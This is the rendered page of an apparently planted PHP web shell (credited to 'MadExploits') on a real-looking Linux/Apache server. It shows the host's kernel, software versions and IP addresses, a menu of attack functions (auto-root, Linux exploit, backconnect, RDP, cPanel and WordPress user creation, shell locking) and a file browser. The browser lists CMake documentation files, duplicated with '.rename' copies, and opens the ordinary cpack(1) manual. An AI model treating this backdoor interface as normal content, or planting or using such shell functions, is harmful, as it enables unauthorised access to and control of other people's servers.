Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cmake3 /
Help /
manual /
[ HOME SHELL ]
Name
Size
Permission
Action
ID_RESERVE.txt
266
B
-rw-r--r--
LINKS.txt
430
B
-rw-r--r--
OPTIONS_BUILD.txt
4.65
KB
-rw-r--r--
OPTIONS_BUILD.txt.rename
4.65
KB
-rw-r--r--
OPTIONS_HELP.txt
3.56
KB
-rw-r--r--
OPTIONS_HELP.txt.rename
3.55
KB
-rw-r--r--
VS-Choose-Arch.png
10.87
KB
-rw-r--r--
ccmake.1.rst
893
B
-rw-r--r--
ccmake.1.rst.rename
889
B
-rw-r--r--
cmake-buildsystem.7.rst
38.38
KB
-rw-r--r--
cmake-buildsystem.7.rst.rename
38.37
KB
-rw-r--r--
cmake-commands.7.rst
4.01
KB
-rw-r--r--
cmake-commands.7.rst.rename
4.01
KB
-rw-r--r--
cmake-compile-features.7.rst
13.23
KB
-rw-r--r--
cmake-compile-features.7.rst.r...
13.23
KB
-rw-r--r--
cmake-developer.7.rst
14.9
KB
-rw-r--r--
cmake-developer.7.rst.rename
14.89
KB
-rw-r--r--
cmake-env-variables.7.rst
1.73
KB
-rw-r--r--
cmake-env-variables.7.rst.rena...
1.73
KB
-rw-r--r--
cmake-file-api.7.rst
39.76
KB
-rw-r--r--
cmake-file-api.7.rst.rename
39.76
KB
-rw-r--r--
cmake-generator-expressions.7....
26.47
KB
-rw-r--r--
cmake-generator-expressions.7....
26.46
KB
-rw-r--r--
cmake-generators.7.rst
3.02
KB
-rw-r--r--
cmake-generators.7.rst.rename
3.01
KB
-rw-r--r--
cmake-gui.1.rst
1.13
KB
-rw-r--r--
cmake-gui.1.rst.rename
1.12
KB
-rw-r--r--
cmake-language.7.rst
19.16
KB
-rw-r--r--
cmake-language.7.rst.rename
19.16
KB
-rw-r--r--
cmake-modules.7.rst
7.45
KB
-rw-r--r--
cmake-modules.7.rst.rename
7.45
KB
-rw-r--r--
cmake-packages.7.rst
27.12
KB
-rw-r--r--
cmake-packages.7.rst.rename
27.11
KB
-rw-r--r--
cmake-policies.7.rst
12.6
KB
-rw-r--r--
cmake-policies.7.rst.rename
12.6
KB
-rw-r--r--
cmake-properties.7.rst
16.72
KB
-rw-r--r--
cmake-properties.7.rst.rename
16.72
KB
-rw-r--r--
cmake-qt.7.rst
10.05
KB
-rw-r--r--
cmake-qt.7.rst.rename
10.04
KB
-rw-r--r--
cmake-server.7.rst
21.76
KB
-rw-r--r--
cmake-server.7.rst.rename
21.75
KB
-rw-r--r--
cmake-toolchains.7.rst
25.08
KB
-rw-r--r--
cmake-toolchains.7.rst.rename
25.07
KB
-rw-r--r--
cmake-variables.7.rst
24.4
KB
-rw-r--r--
cmake-variables.7.rst.rename
24.39
KB
-rw-r--r--
cmake.1.rst
24.79
KB
-rw-r--r--
cmake.1.rst.rename
24.74
KB
-rw-r--r--
cpack-generators.7.rst
478
B
-rw-r--r--
cpack-generators.7.rst.rename
476
B
-rw-r--r--
cpack.1.rst
4.2
KB
-rw-r--r--
cpack.1.rst.rename
4.19
KB
-rw-r--r--
ctest.1.rst
55.54
KB
-rw-r--r--
ctest.1.rst.rename
55.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpack.1.rst.rename
.. cmake-manual-description: CPack Command-Line Reference cpack(1) ******** Synopsis ======== .. parsed-literal:: cpack [<options>] Description =========== The **cpack** executable is the CMake packaging program. It generates installers and source packages in a variety of formats. For each installer or package format, **cpack** has a specific backend, called "generator". A generator is responsible for generating the required inputs and invoking the specific package creation tools. These installer or package generators are not to be confused with the makefile generators of the :manual:`cmake <cmake(1)>` command. All supported generators are specified in the :manual:`cpack-generators <cpack-generators(7)>` manual. The command ``cpack --help`` prints a list of generators supported for the target platform. Which of them are to be used can be selected through the :variable:`CPACK_GENERATOR` variable or through the command-line option ``-G``. The **cpack** program is steered by a configuration file written in the :manual:`CMake language <cmake-language(7)>`. Unless chosen differently through the command-line option ``--config``, the file ``CPackConfig.cmake`` in the current directory is used. In the standard CMake workflow, the file ``CPackConfig.cmake`` is generated by the :manual:`cmake <cmake(1)>` executable, provided the :module:`CPack` module is included by the project's ``CMakeLists.txt`` file. Options ======= ``-G <generators>`` ``<generators>`` is a :ref:`semicolon-separated list <CMake Language Lists>` of generator names. ``cpack`` will iterate through this list and produce package(s) in that generator's format according to the details provided in the ``CPackConfig.cmake`` configuration file. If this option is not given, the :variable:`CPACK_GENERATOR` variable determines the default set of generators that will be used. ``-C <configs>`` Specify the project configuration(s) to be packaged (e.g. ``Debug``, ``Release``, etc.), where ``<configs>`` is a :ref:`semicolon-separated list <CMake Language Lists>`. When the CMake project uses a multi-configuration generator such as Xcode or Visual Studio, this option is needed to tell ``cpack`` which built executables to include in the package. The user is responsible for ensuring that the configuration(s) listed have already been built before invoking ``cpack``. ``-D <var>=<value>`` Set a CPack variable. This will override any value set for ``<var>`` in the input file read by ``cpack``. ``--config <configFile>`` Specify the configuration file read by ``cpack`` to provide the packaging details. By default, ``CPackConfig.cmake`` in the current directory will be used. ``--verbose, -V`` Run ``cpack`` with verbose output. This can be used to show more details from the package generation tools and is suitable for project developers. ``--debug`` Run ``cpack`` with debug output. This option is intended mainly for the developers of ``cpack`` itself and is not normally needed by project developers. ``--trace`` Put the underlying cmake scripts in trace mode. ``--trace-expand`` Put the underlying cmake scripts in expanded trace mode. ``-P <packageName>`` Override/define the value of the :variable:`CPACK_PACKAGE_NAME` variable used for packaging. Any value set for this variable in the ``CPackConfig.cmake`` file will then be ignored. ``-R <packageVersion>`` Override/define the value of the :variable:`CPACK_PACKAGE_VERSION` variable used for packaging. It will override a value set in the ``CPackConfig.cmake`` file or one automatically computed from :variable:`CPACK_PACKAGE_VERSION_MAJOR`, :variable:`CPACK_PACKAGE_VERSION_MINOR` and :variable:`CPACK_PACKAGE_VERSION_PATCH`. ``-B <packageDirectory>`` Override/define :variable:`CPACK_PACKAGE_DIRECTORY`, which controls the directory where CPack will perform its packaging work. The resultant package(s) will be created at this location by default and a ``_CPack_Packages`` subdirectory will also be created below this directory to use as a working area during package creation. ``--vendor <vendorName>`` Override/define :variable:`CPACK_PACKAGE_VENDOR`. .. include:: OPTIONS_HELP.txt See Also ======== .. include:: LINKS.txt
Close